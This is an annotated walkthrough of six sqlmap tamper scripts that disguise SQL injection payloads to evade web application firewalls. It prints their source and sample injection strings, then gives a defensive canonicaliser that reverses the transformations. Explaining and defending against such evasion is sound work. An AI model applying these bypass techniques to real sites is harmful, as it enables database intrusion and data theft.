Analysis of the tamper scripts in sqlmap
space2randomblank
Function: replaces each space character with a random blank character drawn from an alternate set (%09, %0A, %0C, %0D). The script is database-agnostic and is aimed at WAFs that only look for the literal space.
Example (the docstring's doctest; random.seed(0) is set first so the random choice is reproducible):
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'
Annotated source:
```python
#!/usr/bin/env python
# The shebang asks env to look up the python interpreter on PATH and run this file with it.

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import random

from lib.core.compat import xrange   # sqlmap's Python 2/3 compatible xrange (lib/core/compat.py)
from lib.core.enums import PRIORITY  # the PRIORITY enum from lib/core/enums.py, used to order tamper scripts

__priority__ = PRIORITY.LOW  # priority of this script relative to other tampers in a chain

def dependencies():
    # Kept so the script has the same structure as the other tampers; there is nothing to check here.
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with a random blank character from a valid set of alternate characters

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass several web application firewalls

    >>> random.seed(0)
    >>> tamper('SELECT id FROM users')
    'SELECT%0Did%0CFROM%0Ausers'
    """

    # ASCII table:
    #   TAB     09      horizontal TAB
    #   LF      0A      new line
    #   FF      0C      new page
    #   CR      0D      carriage return

    blanks = ("%09", "%0A", "%0C", "%0D")
    retVal = payload

    if payload:                          # an empty payload is returned unchanged
        retVal = ""                      # the payload is rebuilt character by character
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):   # xrange yields the indices lazily instead of building a list
            if not firstspace:
                if payload[i].isspace():          # True when this single character is whitespace
                    firstspace = True
                    retVal += random.choice(blanks)  # one of the four blanks, chosen at random
                    continue                         # skip to the next character

            elif payload[i] == '\'':     # toggle: are we inside a single-quoted string?
                quote = not quote

            elif payload[i] == '"':      # toggle: are we inside a double-quoted string?
                doublequote = not doublequote

            elif payload[i] == ' ' and not doublequote and not quote:
                # only spaces outside string literals are replaced
                retVal += random.choice(blanks)
                continue

            retVal += payload[i]         # every other character is copied through unchanged

    return retVal                        # the payload with its spaces replaced
```
symboliclogical
Function: replaces the AND and OR logical operators with their symbolic forms && and ||, URL-encoded as %26%26 and %7C%7C
Annotated source:
```python
#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

    >>> tamper("1 AND '1'='1")
    "1 %26%26 '1'='1"
    """

    retVal = payload  # default: the payload is returned unchanged

    if payload:
        # \b...\b matches whole words only and (?i) ignores case; OR is rewritten first, then AND.
        # The replacements are URL-encoded (%26%26 is &&, %7C%7C is ||) because a raw & would be
        # read as a query-string parameter separator.
        retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))

    return retVal
```
uppercase
Function: rewrites every SQL keyword in the payload in upper case
Annotated source:
```python
#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb         # kb.keywords: the set of SQL keywords sqlmap knows
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces each keyword character with upper case value (e.g. select -> SELECT)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases

    >>> tamper('insert')
    'INSERT'
    """

    retVal = payload

    if payload:
        for match in re.finditer(r"[A-Za-z_]+", retVal):  # every run of letters/underscores in the payload
            word = match.group()                          # the matched word

            if word.upper() in kb.keywords:               # only words that are SQL keywords known to sqlmap are rewritten
                # str.replace rewrites every occurrence of this substring in the payload, not just this match
                retVal = retVal.replace(word, word.upper())

    return retVal  # the payload with its keywords in upper case
```
informationschemacomment
Function: inserts an inline comment (/**/) between every (MySQL) information_schema identifier and the dot that follows it
Annotated source:
```python
#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload, **kwargs):
    """
    Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier

    >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
    'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
    """

    retVal = payload

    if payload:  # an empty payload is returned unchanged
        # (?i) makes the match case-insensitive; \g<1> re-emits the identifier exactly as it was
        # written, so only the /**/ before the dot is new.
        retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)

    return retVal
```
least
Function: replaces the greater-than operator (>) with an equivalent LEAST() expression
Annotated source:
```python
#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces greater than operator ('>') with 'LEAST' counterpart

    Tested against:
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls that
          filter the greater than character
        * The LEAST clause is a widespread SQL command. Hence, this
          tamper script should work against majority of databases

    >>> tamper('1 AND A > B')
    '1 AND LEAST(A,B+1)=B+1'
    """

    retVal = payload

    if payload:
        # re.search scans the payload and returns only the FIRST match. Groups:
        #   1: the leading "AND " / "OR " (case-insensitive, whole word, with trailing blanks)
        #   3: the left operand, the shortest run of non-'>' characters before the operator
        #   4: the right operand, either a word (\w is [A-Za-z0-9_]) or a single-quoted string
        match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)

        if match:
            # For integer operands A > B holds exactly when B+1 <= A, i.e. LEAST(A, B+1) = B+1
            _ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))
            retVal = retVal.replace(match.group(0), _)  # swap the whole matched comparison for the rewrite

    return retVal
```
lowercase
Function: rewrites every SQL keyword in the payload in lower case
Annotated source:
```python
#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb         # kb.keywords: the set of SQL keywords sqlmap knows
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces each keyword character with lower case value (e.g. SELECT -> select)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions

    >>> tamper('INSERT')
    'insert'
    """

    retVal = payload  # working copy of the payload

    if payload:
        for match in re.finditer(r"\b[A-Za-z_]+\b", retVal):  # whole words only, unlike the uppercase script
            word = match.group()                              # the matched word

            if word.upper() in kb.keywords:                   # only words that are SQL keywords known to sqlmap are rewritten
                # str.replace rewrites every occurrence of this substring in the payload, not just this match
                retVal = retVal.replace(word, word.lower())

    return retVal  # the payload with its keywords in lower case
```
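All six scripts above target the same weakness: a WAF rule that matches the literal bytes of a keyword, an ASCII space, or the > operator. The example below is added here and is not part of sqlmap: a small canonicaliser that undoes each of the six transformations before a rule runs, paired with a deliberately naive rule to show which tampered payloads it misses on the raw request and catches after normalisation. The KEYWORDS set, NAIVE_RULE and the sample payloads are constructed for the example (sqlmap's real keyword list lives in kb.keywords); the sample inputs are the outputs shown in the docstrings above.

```python
import re
from urllib.parse import unquote

# Constructed keyword set for this example; sqlmap's uppercase/lowercase tampers
# consult kb.keywords, which is far longer.
KEYWORDS = {"SELECT", "FROM", "WHERE", "AND", "OR", "UNION", "INSERT",
            "INFORMATION_SCHEMA", "TABLES", "LEAST"}

# A deliberately naive rule of the kind the tampers are written to evade:
# it needs ASCII spaces and literal AND / OR / SELECT ... FROM tokens.
NAIVE_RULE = re.compile(r"(?i)\bAND\b|\bOR\b|\bSELECT \S+ FROM\b")

_QUOTED = re.compile(r"'[^']*'|\"[^\"]*\"")        # string literals, left untouched
_COMMENT = re.compile(r"/\*.*?\*/", re.S)          # informationschemacomment's /**/
_BLANK = re.compile(r"[ \t\n\x0b\x0c\r]+")          # space2randomblank's %09 %0A %0C %0D
_LEAST = re.compile(r"(?i)\bLEAST\(([^,()]+),([^,()]+)\+1\)=\2\+1")  # least's rewrite


def _fold_segment(seg: str) -> str:
    """Canonicalise one run of text that lies outside any string literal."""
    seg = _COMMENT.sub("", seg)                                # strip inline comments
    seg = seg.replace("&&", " AND ").replace("||", " OR ")     # undo symboliclogical
    seg = _LEAST.sub(r"\1 > \2", seg)                          # LEAST(A,B+1)=B+1 -> A > B
    seg = re.sub(r"[A-Za-z_]+",                                # undo uppercase/lowercase
                 lambda m: m.group().upper() if m.group().upper() in KEYWORDS else m.group(),
                 seg)
    return _BLANK.sub(" ", seg)                                # any blank run -> one space


def normalize(payload: str) -> str:
    """URL-decode, then canonicalise everything outside quoted strings."""
    decoded = unquote(payload)          # %0A -> "\n", %26%26 -> "&&", ...
    out, pos = [], 0
    for m in _QUOTED.finditer(decoded):
        out.append(_fold_segment(decoded[pos:m.start()]))
        out.append(m.group())           # quoted contents are copied verbatim
        pos = m.end()
    out.append(_fold_segment(decoded[pos:]))
    return "".join(out).strip()


def naive_hit(payload: str) -> bool:
    """Does the naive rule fire on the raw (tampered) request?"""
    return NAIVE_RULE.search(payload) is not None


def normalized_hit(payload: str) -> bool:
    """Does the same rule fire once the request has been canonicalised?"""
    return NAIVE_RULE.search(normalize(payload)) is not None


# Constructed inputs: the outputs the tamper docstrings above produce, plus one
# with && inside a string literal to show that quoted text is preserved.
SAMPLES = {
    "SELECT%0Did%0CFROM%0Ausers": "SELECT id FROM users",
    "select%09id%09from%09users": "SELECT id FROM users",
    "1 %26%26 '1'='1": "1 AND '1'='1",
    "SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES": "SELECT table_name FROM INFORMATION_SCHEMA.TABLES",
    "1 AND LEAST(A,B+1)=B+1": "1 AND A > B",
    "1 %26%26 name='a %26%26 b'": "1 AND name='a && b'",
}

if __name__ == "__main__":
    for raw, expected in SAMPLES.items():
        got = normalize(raw)
        print(f"{raw!r:55} naive={naive_hit(raw)!s:5} normalized={normalized_hit(raw)!s:5} -> {got!r}")
        assert got == expected
```

The naive rule misses the space2randomblank and symboliclogical outputs on the raw request and catches them after normalisation; the least and informationschemacomment outputs already contain a literal AND or SELECT ... FROM, so for those the gain is a canonical form that a stricter rule can match. Canonicalising before matching, rather than enumerating every encoding a tamper can emit, is the general defence against this whole family of scripts.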